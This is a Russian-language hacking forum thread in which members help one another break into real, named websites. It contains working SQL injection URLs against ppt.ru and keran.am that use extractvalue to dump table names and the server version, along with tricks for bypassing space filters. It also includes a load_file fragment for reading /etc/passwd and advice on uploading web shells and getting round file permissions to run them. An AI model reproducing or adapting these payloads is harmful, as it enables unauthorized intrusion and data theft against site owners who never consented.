Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. NonBlizz

    NonBlizz Banned

    Joined:
    27 Aug 2016
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Блин братух чё то не фига)) там походу стоит фильтрация всех типов пробелов или как, короче вот смотри:
    Code:
    http://ppt.ru/info/1'or%20extractvalue(1,concat(0x3a,(select%20table_name%20from%20information_schema.tables%20limit%200,1)))='1
    Не раз уже с такой проблемой сталкиваюсь, и вот как вывести список таблиц((
     
  2. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    вместо пробелов можно юзать одно из этих.
    /**/, %0d, %0a, %0c, %09

    вариантов куча.
     
    _________________________
    NonBlizz likes this.
  3. NonBlizz

    NonBlizz Banned

    Joined:
    27 Aug 2016
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Пробую и не помогает чё то..... в чём дело не пойму..
     
  4. NonBlizz

    NonBlizz Banned

    Joined:
    27 Aug 2016
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Вот пример:

    Code:
    http://ppt.ru/info/1'or%0aextractvalue(1,concat(0x3a,(select%0atable_name%0afrom%0ainformation_schema.tables%0alimit%0a0,1)))='1
    Код ошибки:
    CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%0aextractvalue(1,concat(0x3a,(select%0atable_name%0afrom%0ainformation_schema.t' at line 1
     
  5. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    831
    Likes Received:
    817
    Reputations:
    90
    судя по ошибке дело в том что данные попадают напрямую в запрос, без урлэнкода, в принципе ты можешь попробовать просто написать пробел вместо %20, ну или использовать аналог пробела /**/
     
    _________________________
  6. NonBlizz

    NonBlizz Banned

    Joined:
    27 Aug 2016
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Заместо пробелов ставил этот символ /**/
    Code:
    http://ppt.ru/info/1'or/**/extractvalue(1,concat(0x3a,(select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1)))='1
    Результат:
    Просто редирект на главную страницу:
    http://ppt.ru/ без ошибок и т.д
     
  7. Nikolaz

    Nikolaz New Member

    Joined:
    17 Nov 2011
    Messages:
    32
    Likes Received:
    4
    Reputations:
    -5
    Есть возможность залить шелл через бекдор, но при заливке через wget,curl или copy - автоматом на любой файл выставляются засратые права не позволяющие его запустить. chmod не помогает права меняются, но на выполнение всё равно нет. В других форматах (не php) пробовал притягивать - та же история. Можно что то придумать чтобы как то получить нормальные права и запустить шелл?
     
  8. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    399
    Likes Received:
    38
    Reputations:
    1
    keran.am/catalog/296-fonariki/1'%22-fonar_909_9led_3aaa.html помогите раскрутить
     
  9. R3hab

    R3hab Member

    Joined:
    17 May 2015
    Messages:
    117
    Likes Received:
    9
    Reputations:
    6
    HTML:
    http://keran.am/catalog/296-fonariki/119-fonar.html'or(ExtractValue(1,concat(0x3a,(select(version())))))='1
     
  10. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    399
    Likes Received:
    38
    Reputations:
    1
    Спасибо, подправил за место версии поставил INFORMATION_SCHEMA узнал bd
     
  11. R3hab

    R3hab Member

    Joined:
    17 May 2015
    Messages:
    117
    Likes Received:
    9
    Reputations:
    6
    залил шелл на сайт,но не хочет открываться,выдает ошибку
    можно ее как то обойти?
     
  12. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    399
    Likes Received:
    38
    Reputations:
    1
    Попробуй залить другой, мог антивирус сервака удалить. Или там права на файлы поставлены тогда да, надо как то обходить
     
  13. pw0ned

    pw0ned Member

    Joined:
    8 Jan 2016
    Messages:
    119
    Likes Received:
    47
    Reputations:
    14
    Значит не залил. Возможно обращаешься по неправильному пути.
     
  14. R3hab

    R3hab Member

    Joined:
    17 May 2015
    Messages:
    117
    Likes Received:
    9
    Reputations:
    6
    если бы не залилось,то выдавало бы другую ошибку
     
  15. pw0ned

    pw0ned Member

    Joined:
    8 Jan 2016
    Messages:
    119
    Likes Received:
    47
    Reputations:
    14
    точно.

    ну тогда видимо chmod, выставлены права на папку к которой обращаешься.
     
  16. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    243
    Likes Received:
    87
    Reputations:
    1
    Имеется sql-inj через нее можно смотреть файлы
    ....mid((cast(concat(load_file(/etc/passwd),.....
    Возможно ли вывод load_file сделать в base64?
     
  17. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    399
    Likes Received:
    38
    Reputations:
    1
    Эм sql на файлы ?! Это как, не я не чего против не имею может просто не знал, если кто прошаренный киньте ссылку на подробное описани
     
  18. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    243
    Likes Received:
    87
    Reputations:
    1
    Я наверно немножко неправильно выразился: "Load File: Читает содержимое файла и возвращает его в виде строки."
    Если у пользователя достаточно прав
    Но вопрос остается открытым
     
  19. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    можно, а толку, все равно по одному символу выводить
     
    _________________________
  20. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    243
    Likes Received:
    87
    Reputations:
    1
    Не подскажешь как именно? на будущее
     
Loading...